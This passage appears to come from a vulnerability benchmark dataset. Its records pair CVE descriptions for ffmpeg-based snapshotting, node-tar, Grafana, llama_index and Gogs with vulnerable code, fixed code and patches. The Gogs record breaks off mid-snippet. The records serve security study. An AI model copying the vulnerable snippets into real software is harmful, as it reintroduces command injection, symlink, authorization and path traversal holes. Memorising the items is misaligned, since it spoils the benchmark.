param=%v\", param))\n+\tparams := []string{\n+\t\t\"-i\", inputUrl,\n+\t\t\"-vf\", \"fps=1\",\n+\t\t\"-vcodec\", \"png\",\n+\t\t\"-f\", \"image2\",\n+\t\t\"-an\",\n+\t\t\"-vframes\", strconv.Itoa(v.vframes),\n+\t\t\"-y\", normalPicPath,\n+\t}\n+\tlog.Println(fmt.Sprintf(\"start snapshot, cmd param=%v %v\", ffmpegPath, strings.Join(params, \" \")))\n \ttimeoutCtx, _ := context.WithTimeout(v.cancelCtx, v.timeout)\n-\tcmd := exec.CommandContext(timeoutCtx, \"/bin/bash\", \"-c\", param)\n+\tcmd := exec.CommandContext(timeoutCtx, ffmpegPath, params...)\n \tif err = cmd.Run(); err != nil {\n \t\tlog.Println(fmt.Sprintf(\"run snapshot %v cmd failed, err is %v\", v.Tag(), err))\n \t\treturn\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-32803", "cve_description": "The npm package \"tar\" (aka node-tar) before versions 6.1.2, 5.0.7, 4.4.15, and 3.2.3 has an arbitrary File Creation/Overwrite vulnerability via insufficient symlink protection. `node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary `stat` calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory. This order of operations resulted in the directory being created and added to the `node-tar` directory cache. 
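The core of the CVE-2023-34105 fix above is swapping a shell-interpolated command string (run via /bin/bash -c) for an explicit argument vector, so a request-controlled inputUrl can no longer smuggle extra shell commands into the ffmpeg invocation. A minimal Python sketch of the same pattern follows; the helper name and defaults are illustrative, and ffmpeg is assumed to be on PATH:

    import subprocess

    def snapshot(ffmpeg_path, input_url, vframes, out_pattern, timeout=30):
        # Vulnerable shape: subprocess.run(f"{ffmpeg_path} -i {input_url} ...", shell=True)
        # lets a URL like "x; rm -rf /tmp/x" execute as shell commands.
        # Safe shape: pass argv as a list; input_url stays a single argument
        # and is never parsed by a shell.
        argv = [
            ffmpeg_path,
            "-i", input_url,
            "-vf", "fps=1",
            "-vcodec", "png",
            "-f", "image2",
            "-an",
            "-vframes", str(vframes),
            "-y", out_pattern,
        ]
        return subprocess.run(argv, timeout=timeout, check=True)

This mirrors the Go fix's move from exec.CommandContext("/bin/bash", "-c", param) to exec.CommandContext(ffmpegPath, params...): the injection disappears because no shell ever interprets the input.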
When a directory is present in the directory cache, subsequent calls to mkdir for that directory are skipped. However, this is also where `node-tar` checks for symlinks occur. By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass `node-tar` symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. This issue was addressed in releases 3.2.3, 4.4.15, 5.0.7 and 6.1.2.", "cwe_info": {"CWE-59": {"name": "Improper Link Resolution Before File Access ('Link Following')", "description": "The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource."}}, "repo": "https://github.com/npm/node-tar", "patch_url": ["https://github.com/npm/node-tar/commit/9dbdeb6df8e9dbd96fa9e84341b9d74734be6c20"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_47_1", "commit": "df3aa4d", "file_path": "lib/unpack.js", "start_line": 415, "end_line": 437, "snippet": " [CHECKFS] (entry) {\n this[PEND]()\n this[MKDIR](path.dirname(entry.absolute), this.dmode, er => {\n if (er)\n return this[ONERROR](er, entry)\n fs.lstat(entry.absolute, (er, st) => {\n if (st && (this.keep || this.newer && st.mtime > entry.mtime))\n this[SKIP](entry)\n else if (er || this[ISREUSABLE](entry, st))\n this[MAKEFS](null, entry)\n else if (st.isDirectory()) {\n if (entry.type === 'Directory') {\n if (!entry.mode || (st.mode & 0o7777) === entry.mode)\n this[MAKEFS](null, entry)\n else\n fs.chmod(entry.absolute, entry.mode, er => this[MAKEFS](er, entry))\n } else\n fs.rmdir(entry.absolute, er => this[MAKEFS](er, entry))\n } else\n unlinkFile(entry.absolute, er => this[MAKEFS](er, entry))\n })\n })\n }"}, {"id": "vul_js_47_2", "commit": "df3aa4d", "file_path": "lib/unpack.js", "start_line": 477, "end_line": 505, "snippet": " [CHECKFS] (entry) {\n const er = this[MKDIR](path.dirname(entry.absolute), this.dmode)\n if (er)\n return this[ONERROR](er, entry)\n try {\n const st = fs.lstatSync(entry.absolute)\n if (this.keep || this.newer && st.mtime > entry.mtime)\n return this[SKIP](entry)\n else if (this[ISREUSABLE](entry, st))\n return this[MAKEFS](null, entry)\n else {\n try {\n if (st.isDirectory()) {\n if (entry.type === 'Directory') {\n if (entry.mode && (st.mode & 0o7777) !== entry.mode)\n fs.chmodSync(entry.absolute, entry.mode)\n } else\n fs.rmdirSync(entry.absolute)\n } else\n unlinkFileSync(entry.absolute)\n return this[MAKEFS](null, entry)\n } catch (er) {\n return this[ONERROR](er, entry)\n }\n }\n } catch (er) {\n return this[MAKEFS](null, entry)\n }\n }"}], "fix_func": [{"id": "fix_js_47_1", "commit": "46fe350", "file_path": "lib/unpack.js", "start_line": 415, "end_line": 451, "snippet": " [CHECKFS] (entry) {\n this[PEND]()\n\n // if we are not creating a directory, and the path is in the dirCache,\n // then that means we are about to delete the directory we created\n // previously, and it is no longer going to be a directory, and neither\n // is any of its children.\n if (entry.type !== 'Directory') {\n for (const path of this.dirCache.keys()) {\n if (path === entry.absolute ||\n path.indexOf(entry.absolute + '/') === 0 ||\n path.indexOf(entry.absolute + '\\\\') === 0)\n this.dirCache.delete(path)\n }\n }\n\n this[MKDIR](path.dirname(entry.absolute), this.dmode, er => {\n if 
(er)\n return this[ONERROR](er, entry)\n fs.lstat(entry.absolute, (er, st) => {\n if (st && (this.keep || this.newer && st.mtime > entry.mtime))\n this[SKIP](entry)\n else if (er || this[ISREUSABLE](entry, st))\n this[MAKEFS](null, entry)\n else if (st.isDirectory()) {\n if (entry.type === 'Directory') {\n if (!entry.mode || (st.mode & 0o7777) === entry.mode)\n this[MAKEFS](null, entry)\n else\n fs.chmod(entry.absolute, entry.mode, er => this[MAKEFS](er, entry))\n } else\n fs.rmdir(entry.absolute, er => this[MAKEFS](er, entry))\n } else\n unlinkFile(entry.absolute, er => this[MAKEFS](er, entry))\n })\n })\n }"}, {"id": "fix_js_47_2", "commit": "46fe350", "file_path": "lib/unpack.js", "start_line": 491, "end_line": 528, "snippet": " [CHECKFS] (entry) {\n if (entry.type !== 'Directory') {\n for (const path of this.dirCache.keys()) {\n if (path === entry.absolute ||\n path.indexOf(entry.absolute + '/') === 0 ||\n path.indexOf(entry.absolute + '\\\\') === 0)\n this.dirCache.delete(path)\n }\n }\n\n const er = this[MKDIR](path.dirname(entry.absolute), this.dmode)\n if (er)\n return this[ONERROR](er, entry)\n try {\n const st = fs.lstatSync(entry.absolute)\n if (this.keep || this.newer && st.mtime > entry.mtime)\n return this[SKIP](entry)\n else if (this[ISREUSABLE](entry, st))\n return this[MAKEFS](null, entry)\n else {\n try {\n if (st.isDirectory()) {\n if (entry.type === 'Directory') {\n if (entry.mode && (st.mode & 0o7777) !== entry.mode)\n fs.chmodSync(entry.absolute, entry.mode)\n } else\n fs.rmdirSync(entry.absolute)\n } else\n unlinkFileSync(entry.absolute)\n return this[MAKEFS](null, entry)\n } catch (er) {\n return this[ONERROR](er, entry)\n }\n }\n } catch (er) {\n return this[MAKEFS](null, entry)\n }\n }"}], "vul_patch": "--- a/lib/unpack.js\n+++ b/lib/unpack.js\n@@ -1,5 +1,19 @@\n [CHECKFS] (entry) {\n this[PEND]()\n+\n+ // if we are not creating a directory, and the path is in the dirCache,\n+ // then that means we are about to delete the directory we created\n+ // previously, and it is no longer going to be a directory, and neither\n+ // is any of its children.\n+ if (entry.type !== 'Directory') {\n+ for (const path of this.dirCache.keys()) {\n+ if (path === entry.absolute ||\n+ path.indexOf(entry.absolute + '/') === 0 ||\n+ path.indexOf(entry.absolute + '\\\\') === 0)\n+ this.dirCache.delete(path)\n+ }\n+ }\n+\n this[MKDIR](path.dirname(entry.absolute), this.dmode, er => {\n if (er)\n return this[ONERROR](er, entry)\n\n--- a/lib/unpack.js\n+++ b/lib/unpack.js\n@@ -1,4 +1,13 @@\n [CHECKFS] (entry) {\n+ if (entry.type !== 'Directory') {\n+ for (const path of this.dirCache.keys()) {\n+ if (path === entry.absolute ||\n+ path.indexOf(entry.absolute + '/') === 0 ||\n+ path.indexOf(entry.absolute + '\\\\') === 0)\n+ this.dirCache.delete(path)\n+ }\n+ }\n+\n const er = this[MKDIR](path.dirname(entry.absolute), this.dmode)\n if (er)\n return this[ONERROR](er, entry)\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-32803:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/node-tar\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnode ./test/unpack.js\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-32803:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/node-tar\ngit apply --whitespace=nowarn /workspace/fix.patch\nnode ./test/unpack.js\n"} {"cve_id": "CVE-2021-39226", "cve_description": "Grafana is an open source data visualization platform. 
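To make the extraction-ordering bug in the node-tar record above (CVE-2021-32803) concrete, here is a minimal Python sketch that builds an archive of the exact shape the advisory describes: a directory entry, then a symlink with the same name, then a file whose path goes through that name. Entry names and the link target are illustrative only.

    import io
    import tarfile

    def build_poc_archive() -> bytes:
        # A vulnerable extractor that caches "cache" as a known directory
        # skips the symlink check on the second entry and then writes
        # escape.txt through the link, outside the extraction root.
        buf = io.BytesIO()
        with tarfile.open(fileobj=buf, mode="w") as tar:
            d = tarfile.TarInfo("cache")
            d.type = tarfile.DIRTYPE
            tar.addfile(d)

            s = tarfile.TarInfo("cache")      # same name as the directory
            s.type = tarfile.SYMTYPE
            s.linkname = "/tmp/outside"       # illustrative target
            tar.addfile(s)

            data = b"written outside the extraction root\n"
            f = tarfile.TarInfo("cache/escape.txt")
            f.size = len(data)
            tar.addfile(f, io.BytesIO(data))
        return buf.getvalue()

The fix above counters exactly this sequence: whenever a non-directory entry arrives, any dirCache entries at or under its path are evicted, so the later symlink can no longer hide behind the cached directory.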
In affected versions unauthenticated and authenticated users are able to view the snapshot with the lowest database key by accessing the literal paths: /dashboard/snapshot/:key, or /api/snapshots/:key. If the snapshot \"public_mode\" configuration setting is set to true (vs default of false), unauthenticated users are able to delete the snapshot with the lowest database key by accessing the literal path: /api/snapshots-delete/:deleteKey. Regardless of the snapshot \"public_mode\" setting, authenticated users are able to delete the snapshot with the lowest database key by accessing the literal paths: /api/snapshots/:key, or /api/snapshots-delete/:deleteKey. The combination of deletion and viewing enables a complete walk through all snapshot data while resulting in complete snapshot data loss. This issue has been resolved in versions 8.1.6 and 7.5.11. If for some reason you cannot upgrade, you can use a reverse proxy or similar to block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, and /dashboard/snapshot/:key. They have no normal function and can be disabled without side effects.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-639": {"name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data."}}, "repo": "https://github.com/grafana/grafana", "patch_url": ["https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269"], "programing_language": "Go", "vul_func": [{"id": "vul_go_138_1", "commit": "c725a42", "file_path": "pkg/api/dashboard_snapshot.go", "start_line": 147, "end_line": 181, "snippet": "func GetDashboardSnapshot(c *models.ReqContext) response.Response {\n\tkey := c.Params(\":key\")\n\tquery := &models.GetDashboardSnapshotQuery{Key: key}\n\n\terr := bus.Dispatch(query)\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard snapshot\", err)\n\t}\n\n\tsnapshot := query.Result\n\n\t// expired snapshots should also be removed from db\n\tif snapshot.Expires.Before(time.Now()) {\n\t\treturn response.Error(404, \"Dashboard snapshot not found\", err)\n\t}\n\n\tdashboard, err := snapshot.DashboardJSON()\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard data for dashboard snapshot\", err)\n\t}\n\n\tdto := dtos.DashboardFullWithMeta{\n\t\tDashboard: dashboard,\n\t\tMeta: dtos.DashboardMeta{\n\t\t\tType: models.DashTypeSnapshot,\n\t\t\tIsSnapshot: true,\n\t\t\tCreated: snapshot.Created,\n\t\t\tExpires: snapshot.Expires,\n\t\t},\n\t}\n\n\tmetrics.MApiDashboardSnapshotGet.Inc()\n\n\treturn response.JSON(200, dto).SetHeader(\"Cache-Control\", \"public, max-age=3600\")\n}"}, {"id": "vul_go_138_2", "commit": "c725a42", "file_path": "pkg/api/dashboard_snapshot.go", "start_line": 216, "end_line": 243, "snippet": "func DeleteDashboardSnapshotByDeleteKey(c *models.ReqContext) response.Response {\n\tkey := c.Params(\":deleteKey\")\n\n\tquery := &models.GetDashboardSnapshotQuery{DeleteKey: key}\n\n\terr := bus.Dispatch(query)\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard snapshot\", err)\n\t}\n\n\tif query.Result.External {\n\t\terr := deleteExternalDashboardSnapshot(query.Result.ExternalDeleteUrl)\n\t\tif err !=
nil {\n\t\t\treturn response.Error(500, \"Failed to delete external dashboard\", err)\n\t\t}\n\t}\n\n\tcmd := &models.DeleteDashboardSnapshotCommand{DeleteKey: query.Result.DeleteKey}\n\n\tif err := bus.Dispatch(cmd); err != nil {\n\t\treturn response.Error(500, \"Failed to delete dashboard snapshot\", err)\n\t}\n\n\treturn response.JSON(200, util.DynMap{\n\t\t\"message\": \"Snapshot deleted. It might take an hour before it's cleared from any CDN caches.\",\n\t\t\"id\": query.Result.Id,\n\t})\n}"}, {"id": "vul_go_138_3", "commit": "c725a42", "file_path": "pkg/api/dashboard_snapshot.go", "start_line": 246, "end_line": 292, "snippet": "func DeleteDashboardSnapshot(c *models.ReqContext) response.Response {\n\tkey := c.Params(\":key\")\n\n\tquery := &models.GetDashboardSnapshotQuery{Key: key}\n\n\terr := bus.Dispatch(query)\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard snapshot\", err)\n\t}\n\tif query.Result == nil {\n\t\treturn response.Error(404, \"Failed to get dashboard snapshot\", nil)\n\t}\n\n\tdashboard, err := query.Result.DashboardJSON()\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard data for dashboard snapshot\", err)\n\t}\n\tdashboardID := dashboard.Get(\"id\").MustInt64()\n\n\tguardian := guardian.New(dashboardID, c.OrgId, c.SignedInUser)\n\tcanEdit, err := guardian.CanEdit()\n\tif err != nil {\n\t\treturn response.Error(500, \"Error while checking permissions for snapshot\", err)\n\t}\n\n\tif !canEdit && query.Result.UserId != c.SignedInUser.UserId {\n\t\treturn response.Error(403, \"Access denied to this snapshot\", nil)\n\t}\n\n\tif query.Result.External {\n\t\terr := deleteExternalDashboardSnapshot(query.Result.ExternalDeleteUrl)\n\t\tif err != nil {\n\t\t\treturn response.Error(500, \"Failed to delete external dashboard\", err)\n\t\t}\n\t}\n\n\tcmd := &models.DeleteDashboardSnapshotCommand{DeleteKey: query.Result.DeleteKey}\n\n\tif err := bus.Dispatch(cmd); err != nil {\n\t\treturn response.Error(500, \"Failed to delete dashboard snapshot\", err)\n\t}\n\n\treturn response.JSON(200, util.DynMap{\n\t\t\"message\": \"Snapshot deleted. 
It might take an hour before it's cleared from any CDN caches.\",\n\t\t\"id\": query.Result.Id,\n\t})\n}"}, {"id": "vul_go_138_4", "commit": "c725a42", "file_path": "pkg/macaron/router.go", "start_line": 289, "end_line": 309, "snippet": "func (r *Router) ServeHTTP(rw http.ResponseWriter, req *http.Request) {\n\tif t, ok := r.routers[req.Method]; ok {\n\t\t// Fast match for static routes\n\t\tleaf := r.getLeaf(req.Method, req.URL.Path)\n\t\tif leaf != nil {\n\t\t\tleaf.handle(rw, req, nil)\n\t\t\treturn\n\t\t}\n\n\t\th, p, ok := t.Match(req.URL.EscapedPath())\n\t\tif ok {\n\t\t\tif splat, ok := p[\"*0\"]; ok {\n\t\t\t\tp[\"*\"] = splat // Easy name.\n\t\t\t}\n\t\t\th(rw, req, p)\n\t\t\treturn\n\t\t}\n\t}\n\n\tr.notFound(rw, req)\n}"}], "fix_func": [{"id": "fix_go_138_1", "commit": "2d456a6", "file_path": "pkg/api/dashboard_snapshot.go", "start_line": 147, "end_line": 184, "snippet": "func GetDashboardSnapshot(c *models.ReqContext) response.Response {\n\tkey := c.Params(\":key\")\n\tif len(key) == 0 {\n\t\treturn response.Error(404, \"Snapshot not found\", nil)\n\t}\n\tquery := &models.GetDashboardSnapshotQuery{Key: key}\n\n\terr := bus.Dispatch(query)\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard snapshot\", err)\n\t}\n\n\tsnapshot := query.Result\n\n\t// expired snapshots should also be removed from db\n\tif snapshot.Expires.Before(time.Now()) {\n\t\treturn response.Error(404, \"Dashboard snapshot not found\", err)\n\t}\n\n\tdashboard, err := snapshot.DashboardJSON()\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard data for dashboard snapshot\", err)\n\t}\n\n\tdto := dtos.DashboardFullWithMeta{\n\t\tDashboard: dashboard,\n\t\tMeta: dtos.DashboardMeta{\n\t\t\tType: models.DashTypeSnapshot,\n\t\t\tIsSnapshot: true,\n\t\t\tCreated: snapshot.Created,\n\t\t\tExpires: snapshot.Expires,\n\t\t},\n\t}\n\n\tmetrics.MApiDashboardSnapshotGet.Inc()\n\n\treturn response.JSON(200, dto).SetHeader(\"Cache-Control\", \"public, max-age=3600\")\n}"}, {"id": "fix_go_138_2", "commit": "2d456a6", "file_path": "pkg/api/dashboard_snapshot.go", "start_line": 219, "end_line": 249, "snippet": "func DeleteDashboardSnapshotByDeleteKey(c *models.ReqContext) response.Response {\n\tkey := c.Params(\":deleteKey\")\n\tif len(key) == 0 {\n\t\treturn response.Error(404, \"Snapshot not found\", nil)\n\t}\n\n\tquery := &models.GetDashboardSnapshotQuery{DeleteKey: key}\n\n\terr := bus.Dispatch(query)\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard snapshot\", err)\n\t}\n\n\tif query.Result.External {\n\t\terr := deleteExternalDashboardSnapshot(query.Result.ExternalDeleteUrl)\n\t\tif err != nil {\n\t\t\treturn response.Error(500, \"Failed to delete external dashboard\", err)\n\t\t}\n\t}\n\n\tcmd := &models.DeleteDashboardSnapshotCommand{DeleteKey: query.Result.DeleteKey}\n\n\tif err := bus.Dispatch(cmd); err != nil {\n\t\treturn response.Error(500, \"Failed to delete dashboard snapshot\", err)\n\t}\n\n\treturn response.JSON(200, util.DynMap{\n\t\t\"message\": \"Snapshot deleted. 
It might take an hour before it's cleared from any CDN caches.\",\n\t\t\"id\": query.Result.Id,\n\t})\n}"}, {"id": "fix_go_138_3", "commit": "2d456a6", "file_path": "pkg/api/dashboard_snapshot.go", "start_line": 252, "end_line": 301, "snippet": "func DeleteDashboardSnapshot(c *models.ReqContext) response.Response {\n\tkey := c.Params(\":key\")\n\tif len(key) == 0 {\n\t\treturn response.Error(404, \"Snapshot not found\", nil)\n\t}\n\n\tquery := &models.GetDashboardSnapshotQuery{Key: key}\n\n\terr := bus.Dispatch(query)\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard snapshot\", err)\n\t}\n\tif query.Result == nil {\n\t\treturn response.Error(404, \"Failed to get dashboard snapshot\", nil)\n\t}\n\n\tdashboard, err := query.Result.DashboardJSON()\n\tif err != nil {\n\t\treturn response.Error(500, \"Failed to get dashboard data for dashboard snapshot\", err)\n\t}\n\tdashboardID := dashboard.Get(\"id\").MustInt64()\n\n\tguardian := guardian.New(dashboardID, c.OrgId, c.SignedInUser)\n\tcanEdit, err := guardian.CanEdit()\n\tif err != nil {\n\t\treturn response.Error(500, \"Error while checking permissions for snapshot\", err)\n\t}\n\n\tif !canEdit && query.Result.UserId != c.SignedInUser.UserId {\n\t\treturn response.Error(403, \"Access denied to this snapshot\", nil)\n\t}\n\n\tif query.Result.External {\n\t\terr := deleteExternalDashboardSnapshot(query.Result.ExternalDeleteUrl)\n\t\tif err != nil {\n\t\t\treturn response.Error(500, \"Failed to delete external dashboard\", err)\n\t\t}\n\t}\n\n\tcmd := &models.DeleteDashboardSnapshotCommand{DeleteKey: query.Result.DeleteKey}\n\n\tif err := bus.Dispatch(cmd); err != nil {\n\t\treturn response.Error(500, \"Failed to delete dashboard snapshot\", err)\n\t}\n\n\treturn response.JSON(200, util.DynMap{\n\t\t\"message\": \"Snapshot deleted. 
It might take an hour before it's cleared from any CDN caches.\",\n\t\t\"id\": query.Result.Id,\n\t})\n}"}, {"id": "fix_go_138_4", "commit": "2d456a6", "file_path": "pkg/macaron/router.go", "start_line": 289, "end_line": 311, "snippet": "func (r *Router) ServeHTTP(rw http.ResponseWriter, req *http.Request) {\n\tif t, ok := r.routers[req.Method]; ok {\n\t\t// Fast match for static routes\n\t\tif !strings.ContainsAny(req.URL.Path, \":*\") {\n\t\t\tleaf := r.getLeaf(req.Method, req.URL.Path)\n\t\t\tif leaf != nil {\n\t\t\t\tleaf.handle(rw, req, nil)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\n\t\th, p, ok := t.Match(req.URL.EscapedPath())\n\t\tif ok {\n\t\t\tif splat, ok := p[\"*0\"]; ok {\n\t\t\t\tp[\"*\"] = splat // Easy name.\n\t\t\t}\n\t\t\th(rw, req, p)\n\t\t\treturn\n\t\t}\n\t}\n\n\tr.notFound(rw, req)\n}"}], "vul_patch": "--- a/pkg/api/dashboard_snapshot.go\n+++ b/pkg/api/dashboard_snapshot.go\n@@ -1,5 +1,8 @@\n func GetDashboardSnapshot(c *models.ReqContext) response.Response {\n \tkey := c.Params(\":key\")\n+\tif len(key) == 0 {\n+\t\treturn response.Error(404, \"Snapshot not found\", nil)\n+\t}\n \tquery := &models.GetDashboardSnapshotQuery{Key: key}\n \n \terr := bus.Dispatch(query)\n\n--- a/pkg/api/dashboard_snapshot.go\n+++ b/pkg/api/dashboard_snapshot.go\n@@ -1,5 +1,8 @@\n func DeleteDashboardSnapshotByDeleteKey(c *models.ReqContext) response.Response {\n \tkey := c.Params(\":deleteKey\")\n+\tif len(key) == 0 {\n+\t\treturn response.Error(404, \"Snapshot not found\", nil)\n+\t}\n \n \tquery := &models.GetDashboardSnapshotQuery{DeleteKey: key}\n \n\n--- a/pkg/api/dashboard_snapshot.go\n+++ b/pkg/api/dashboard_snapshot.go\n@@ -1,5 +1,8 @@\n func DeleteDashboardSnapshot(c *models.ReqContext) response.Response {\n \tkey := c.Params(\":key\")\n+\tif len(key) == 0 {\n+\t\treturn response.Error(404, \"Snapshot not found\", nil)\n+\t}\n \n \tquery := &models.GetDashboardSnapshotQuery{Key: key}\n \n\n--- a/pkg/macaron/router.go\n+++ b/pkg/macaron/router.go\n@@ -1,10 +1,12 @@\n func (r *Router) ServeHTTP(rw http.ResponseWriter, req *http.Request) {\n \tif t, ok := r.routers[req.Method]; ok {\n \t\t// Fast match for static routes\n-\t\tleaf := r.getLeaf(req.Method, req.URL.Path)\n-\t\tif leaf != nil {\n-\t\t\tleaf.handle(rw, req, nil)\n-\t\t\treturn\n+\t\tif !strings.ContainsAny(req.URL.Path, \":*\") {\n+\t\t\tleaf := r.getLeaf(req.Method, req.URL.Path)\n+\t\t\tif leaf != nil {\n+\t\t\t\tleaf.handle(rw, req, nil)\n+\t\t\t\treturn\n+\t\t\t}\n \t\t}\n \n \t\th, p, ok := t.Match(req.URL.EscapedPath())\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-12704", "cve_description": "A vulnerability in the LangChainLLM class of the run-llama/llama_index repository, version v0.12.5, allows for a Denial of Service (DoS) attack. The stream_complete method executes the llm using a thread and retrieves the result via the get_response_gen method of the StreamingGeneratorCallbackHandler class. If the thread terminates abnormally before the _llm.predict is executed, there is no exception handling for this case, leading to an infinite loop in the get_response_gen function. 
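The hang described here is easy to reproduce in isolation: a consumer that only checks a token queue and a "done" event spins forever if the producer thread dies before setting the event. The record's fix adds a wall-clock timeout plus a small sleep; the sketch below shows the same guard on a generic producer/consumer pair (simplified, not the library's actual classes):

    import queue
    import threading
    import time

    def drain(tokens: "queue.Queue[str]", done: threading.Event, timeout: float = 5.0):
        # Without the deadline, this loop never exits when the producer
        # raised before calling done.set(): the queue stays empty and the
        # event is never signalled.
        deadline = time.monotonic() + timeout
        while True:
            if time.monotonic() > deadline:
                raise TimeoutError("producer never signalled completion")
            try:
                # Blocking get with a short timeout also avoids busy-spinning
                # on an empty queue (the patch uses a time.sleep(0.01) instead).
                yield tokens.get(timeout=0.05)
            except queue.Empty:
                if done.is_set():
                    return

Raising TimeoutError turns an unbounded hang into an error the caller can handle, which is the essence of the CWE-755 fix in this record.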
This can be triggered by providing an input of an incorrect type, causing the thread to terminate and the process to continue running indefinitely.", "cwe_info": {"CWE-755": {"name": "Improper Handling of Exceptional Conditions", "description": "The product does not handle or incorrectly handles an exceptional condition."}}, "repo": "https://github.com/run-llama/llama_index", "patch_url": ["https://github.com/run-llama/llama_index/commit/d1ecfb77578d089cbe66728f18f635c09aa32a05"], "programing_language": "Python", "vul_func": [{"id": "vul_py_431_1", "commit": "98fd497", "file_path": "llama-index-core/llama_index/core/langchain_helpers/streaming.py", "start_line": 38, "end_line": 44, "snippet": " def get_response_gen(self) -> Generator:\n while True:\n if not self._token_queue.empty():\n token = self._token_queue.get_nowait()\n yield token\n elif self._done.is_set():\n break"}], "fix_func": [{"id": "fix_py_431_1", "commit": "d1ecfb77578d089cbe66728f18f635c09aa32a05", "file_path": "llama-index-core/llama_index/core/langchain_helpers/streaming.py", "start_line": 39, "end_line": 60, "snippet": " def get_response_gen(self, timeout: float = 120.0) -> Generator:\n \"\"\"Get response generator with timeout.\n\n Args:\n timeout (float): Maximum time in seconds to wait for the complete response.\n Defaults to 120 seconds.\n \"\"\"\n start_time = time.time()\n while True:\n if time.time() - start_time > timeout:\n raise TimeoutError(\n f\"Response generation timed out after {timeout} seconds\"\n )\n\n if not self._token_queue.empty():\n token = self._token_queue.get_nowait()\n yield token\n elif self._done.is_set():\n break\n else:\n # Small sleep to prevent CPU spinning\n time.sleep(0.01)"}], "vul_patch": "--- a/llama-index-core/llama_index/core/langchain_helpers/streaming.py\n+++ b/llama-index-core/llama_index/core/langchain_helpers/streaming.py\n@@ -1,7 +1,22 @@\n- def get_response_gen(self) -> Generator:\n+ def get_response_gen(self, timeout: float = 120.0) -> Generator:\n+ \"\"\"Get response generator with timeout.\n+\n+ Args:\n+ timeout (float): Maximum time in seconds to wait for the complete response.\n+ Defaults to 120 seconds.\n+ \"\"\"\n+ start_time = time.time()\n while True:\n+ if time.time() - start_time > timeout:\n+ raise TimeoutError(\n+ f\"Response generation timed out after {timeout} seconds\"\n+ )\n+\n if not self._token_queue.empty():\n token = self._token_queue.get_nowait()\n yield token\n elif self._done.is_set():\n break\n+ else:\n+ # Small sleep to prevent CPU spinning\n+ time.sleep(0.01)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-55947", "cve_description": "Gogs is an open source self-hosted Git service. A malicious user is able to write a file to an arbitrary path on the server to gain SSH access to the server. 
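A request-controlled tree path such as ../../.ssh/authorized_keys must be normalized before it reaches the filesystem; the fix later in this record does so by passing the wildcard route parameter through pathutil.Clean. A rough Python analogue of that sanitization (function name hypothetical, behavior approximated):

    import posixpath

    def clean_tree_path(raw: str) -> str:
        # Anchor at "/" so normpath collapses any leading ".." segments
        # against the root instead of letting them escape it, then return
        # a path that is always relative to the repository root.
        p = posixpath.normpath("/" + raw.strip("/"))
        return p.lstrip("/")

    # clean_tree_path("../../../home/git/.ssh/authorized_keys")
    # -> "home/git/.ssh/authorized_keys"  (can no longer escape the root)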
The vulnerability is fixed in 0.13.1.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/gogs/gogs", "patch_url": ["https://github.com/gogs/gogs/commit/9a9388ace25bd646f5098cb9193d983332c34e41"], "programing_language": "Go", "vul_func": [{"id": "vul_go_93_1", "commit": "8a3b819", "file_path": "internal/route/api/v1/repo/contents.go", "start_line": "104", "end_line": "171", "snippet": "func GetContents(c *context.APIContext) {\n\trepoPath := repoutil.RepositoryPath(c.Params(\":username\"), c.Params(\":reponame\"))\n\tgitRepo, err := git.Open(repoPath)\n\tif err != nil {\n\t\tc.Error(err, \"open repository\")\n\t\treturn\n\t}\n\n\tref := c.Query(\"ref\")\n\tif ref == \"\" {\n\t\tref = c.Repo.Repository.DefaultBranch\n\t}\n\n\tcommit, err := gitRepo.CatFileCommit(ref)\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"get commit\")\n\t\treturn\n\t}\n\n\ttreePath := c.Params(\"*\")\n\tentry, err := commit.TreeEntry(treePath)\n\tif err != nil {\n\t\tc.NotFoundOrError(gitutil.NewError(err), \"get tree entry\")\n\t\treturn\n\t}\n\n\tif !entry.IsTree() {\n\t\tcontent, err := toRepoContent(c, ref, treePath, commit, entry)\n\t\tif err != nil {\n\t\t\tc.Errorf(err, \"convert %q to repoContent\", 